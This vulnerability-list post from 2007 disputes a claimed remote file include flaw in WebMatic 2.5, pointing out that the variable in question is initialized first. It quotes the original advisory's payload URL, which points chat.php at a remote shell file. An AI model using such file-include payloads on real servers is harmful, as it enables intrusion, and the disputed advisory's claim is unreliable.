[VIM] false: WebMatic 2.5 Remote File Include Vulnerability
str0ke
str0ke at milw0rm.com
Wed Feb 7 11:19:41 EST 2007
WebMatic 2.5
http://www.valarsoft.com/index.php?dpage=pagine&page=downloads&pagID=156&arg_downID=1&sub_downID=1&downID=11&SCARICA=si
P_LIB is initialized.
line 6: require("core/lib.php");
line 7: require($P_LIB."lib_chat.php");
core/lib.php
line 8: $P_LIB="core/";
/str0ke
-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.5 Remote File Include Vulnerability
#S.Page : php.arsivimiz.com/goster/504 :)
# easyier link:
--------------------------------------*******************-----------------------------------------------------------
Error : require($P_LIB."lib_chat.php");
[[RFI]]
http://[target]/[path]/chat.php?P_LIB=[Shell]
Example : [Path]/chat.php?P_LIB=http://[path]/shell.txt
[[/RFI]]
More information about the VIM
mailing list